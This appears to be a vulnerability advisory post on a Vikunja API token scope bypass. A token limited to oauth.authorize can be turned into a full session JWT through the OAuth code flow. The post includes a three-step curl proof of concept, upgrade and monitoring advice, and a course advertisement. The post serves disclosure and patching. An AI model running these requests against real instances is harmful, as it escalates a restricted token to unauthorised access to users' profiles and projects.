Listen to this Post
A critical logic flaw exists within the authentication context handling of Vikunja’s API and OAuth subsystems. Specifically, a scoped API token limited strictly to `oauth.authorize` can interact with the OAuth authorization endpoint (/api/v1/oauth/authorize) to successfully request and receive an OAuth authorization code. Because the routing group fails to restrict API-token-authenticated requests from acting as resource owners during code generation, the application treats the scoped token context as valid. Once obtained, this authorization code can be exchanged at the `/api/v1/oauth/token` endpoint using PKCE verification to generate a normal, unrestricted bearer JWT and a refresh token. Consequently, an attacker or compromised integration possessing a narrowly scoped token can bypass intended API permission boundaries, escalating capability to full non-OAuth route access such as reading user profiles and project lists.
DailyCVE Form:
Platform: Vikunja
Version: Prior to 2.6.0
Vulnerability : API Token Scope Bypass
Severity: Medium
date: October 2026
Prediction: Patched in 2.6.0
What Undercode Say:
The core security failure stems from an authentication-context mismatch between scoped API tokens and the OAuth authorization-code issuance workflow. When an API token makes a request to /api/v1/oauth/authorize, the route accepts the API token user context as a valid resource owner without validating that the token itself holds broad enough privileges to mint session credentials. Because permissions are not strictly chained through the token exchange, a token restricted only to authorization capability can be leveraged to mint a full user-session JWT and refresh token, completely circumventing its original scope limitations.
Exploit: (Educational Purposes!)
curl -X POST "https://your-vikunja-instance/api/v1/oauth/authorize" \
-H "Authorization: Bearer <scoped-api-token>" \
-H "Content-Type: application/json" \
-d '{
"response_type": "code",
"client_id": "vikunja",
"redirect_uri": "vikunja-flutter://callback",
"code_challenge": "<pkce-s256-challenge>",
"code_challenge_method": "S256"
}'
curl -X POST "https://your-vikunja-instance/api/v1/oauth/token" \
-H "Content-Type: application/json" \
-d '{
"grant_type": "authorization_code",
"code": "<extracted-auth-code>",
"client_id": "vikunja",
"redirect_uri": "vikunja-flutter://callback",
"code_verifier": "<original-pkce-verifier>"
}'
curl -X GET "https://your-vikunja-instance/api/v1/user" \
-H "Authorization: Bearer <minted-oauth-access-token>"
Protection:
To mitigate this vulnerability, administrators must upgrade Vikunja to version 2.6.0 or later, where strict contextual checks are enforced on OAuth endpoints. Ensure that API-token-authenticated requests are explicitly disallowed from accessing authorization-code issuance flows unless they carry appropriate permissions. Additionally, restrict exposure of API routes and monitor for abnormal token exchange patterns originating from restricted tokens.
Impact:
Successful exploitation allows a narrowly scoped API token—which should normally fail direct access to standard user and project routes—to be fully converted into normal session credentials for the target user. This compromises the integrity of permission boundaries, enabling unauthorized access to protected endpoints like `/api/v1/user` and `/api/v1/projects` outside the intended token scope.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

